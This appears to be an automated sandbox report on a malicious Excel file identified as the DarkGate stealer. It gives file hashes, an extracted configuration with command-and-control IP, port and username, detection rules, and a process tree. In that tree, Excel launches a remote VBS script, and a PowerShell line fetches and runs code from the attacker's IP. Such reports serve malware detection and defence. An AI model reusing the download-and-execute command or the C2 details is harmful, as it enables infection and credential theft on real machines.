Analysis
-
max time kernel
2s -
max time network
98s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
09-04-2024 15:32
Static task
static1
Behavioral task
behavioral1
Sample
statapril2024-9733.xlsx.zip
Resource
win10v2004-20231215-en
General
-
Target
statapril2024-9733.xlsx
-
Size
56KB
-
MD5
1c9558bf179c79b1c5f5e01970d190c5
-
SHA1
007c8fac9c1fa4940750b0c95723d63ca7030d78
-
SHA256
186efcf47d140b869ec75d0d4f3c90ddf4d95c6378cb0195c2be293ccb646899
-
SHA512
378d95f25a82a1860a27927dc2bca6eeabdb323d88014f158392d732965046518fa19f344bb1d3d392dd1be728b5bf646ec885fdf548b6e9106d58e8c8b20738
-
SSDEEP
768:ZFnM1dDlT2qpaOKFSGOJdGvoZCPAUJ1YxBardD2TSWGdCIKD15ogXnlq5I3:/mZ2u4OPKIxoEuDKJnlj3
Malware Config
Extracted
darkgate
admin888
103.124.106.237
-
anti_analysis
true
-
anti_debug
false
-
anti_vm
true
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
bedxvHpr
-
minimum_disk
50
-
minimum_ram
4000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 4 IoCs
resource yara_rule behavioral2/memory/636-62-0x0000000002DC0000-0x0000000002E34000-memory.dmp family_darkgate_v6 behavioral2/memory/636-64-0x0000000002DC0000-0x0000000002E34000-memory.dmp family_darkgate_v6 behavioral2/memory/3600-134-0x0000000004670000-0x00000000046E4000-memory.dmp family_darkgate_v6 behavioral2/memory/3600-136-0x0000000004670000-0x00000000046E4000-memory.dmp family_darkgate_v6 -
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1180 4220 WScript.exe 83 Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4600 4220 WScript.exe 83 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4220 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4220 EXCEL.EXE 4220 EXCEL.EXE 4220 EXCEL.EXE 4220 EXCEL.EXE 4220 EXCEL.EXE 4220 EXCEL.EXE 4220 EXCEL.EXE 4220 EXCEL.EXE 4220 EXCEL.EXE 4220 EXCEL.EXE 4220 EXCEL.EXE 4220 EXCEL.EXE -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 3728 attrib.exe 1356 attrib.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\statapril2024-9733.xlsx"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4220 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\45.89.53.187\s\MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs"2⤵
- Process spawned unexpected child process
PID:1180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '103.124.106.237/wctaehcw')3⤵PID:1912
-
C:\kady\AutoHotkey.exe"C:\kady\AutoHotkey.exe" C:/kady/script.ahk4⤵PID:636
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/kady/4⤵
- Views/modifies file attributes
PID:3728
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\45.89.53.187\s\MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs"2⤵
- Process spawned unexpected child process
PID:4600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '103.124.106.237/wctaehcw')3⤵PID:856
-
C:\kady\AutoHotkey.exe"C:\kady\AutoHotkey.exe" C:/kady/script.ahk4⤵PID:3600
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/kady/4⤵
- Views/modifies file attributes
PID:1356
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5575823193d99373f668956ccfe14c076
SHA1873153cadd6a153ec6867717bcf7594442bdc830
SHA2567cfe94799f1b3e119a0bddc8e22084e6fb2e4f206a22b3d07e349f8db340764f
SHA512986db1b72b1181c9103ead2c38af153aba0bdc21fb84fc097dff049c12838c41a9c7b7aff76da0d0248843c4c338ddc3431d2502cf09e37e3491fe2e1d3fa1c1
-
Filesize
1KB
MD5a4ec988dc7490fc575a308d35d9dc987
SHA18f59e156e855a9a4675161cf26c5781c7f155b4b
SHA2568f8c60c949871d482a0209828f151c505e6913f17e67a3e45f6f574eef8052c9
SHA51257dec4141bba0fb2d0cabe0fb58a493252fa60c62014061f26c76a7b2b346ec7957ae752ae8de01fe5f2279037e243da4a51a399496e2ec24b2de8d64ab91663
-
Filesize
57KB
MD564ed75358a3d5feac3f46bf2c6fb60d8
SHA1acc9241d4451957b6efa9295cf2fb9820eb4205c
SHA256c098129943eb657a143f7a8d7edb4e9b76ca9c8a6f9befea1467684b04c8bd96
SHA512a761f77015e650217bb03bbee303a9844e31d3c460857042638cd4608b7b57d5c59064cdfd9bb5c933e6104421f43cf4d79a181a087d9eae2301f07a0bda84be
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
32B
MD5850a80598386639226c75f1f566a1302
SHA1a985004c9a6bdff0dd86fbef89101147153c363e
SHA256be06ba05be78a2ca1eac21eb6ac4c043973d55d35278de7a11be2f23bc8e54ff
SHA512caf1637a193d1a311c82e8a95af67e04220aab8b5364e6b45d328476381feb5ed9c8ed9377054e279d541d3b271c7fe6012c22d9b60a79cc8bac1a8e8dfb1ce6
-
Filesize
892KB
MD5a59a2d3e5dda7aca6ec879263aa42fd3
SHA1312d496ec90eb30d5319307d47bfef602b6b8c6c
SHA256897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
SHA512852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030
-
Filesize
441B
MD5958cd4a849145b96e92e63ef4e152349
SHA119d79b480294e7c329c19faf87fc5e3320268caa
SHA2568e7070383517cc127dfff26a726a47fc48a9169591e29c8d16df6fdd6d2c591e
SHA5127852834cf31f55c6d97fdc204b59b8177d336c1f5ee1a14ae880e34c3e8c407953f1722274c040c93c5ac978f1a6ddb9d4a1b5019b6d3a99dd081440528210a0
-
Filesize
922KB
MD58ed12b37b69693e66f928cd39fc21c6c
SHA12ee8c14330d38f3ba3c23e4bb56c05b29191ff03
SHA25670223ac25fecd28385f39f36367f93b045c312f062354497dd2702e7d295784d
SHA51250daf960cd89efe9b562db00177f27f3ba9e0929be830406857d9879a49c58f62d5d03c1b01c83104f47784da02b2cc2fab28c9b653e1a1861d4b319271e2795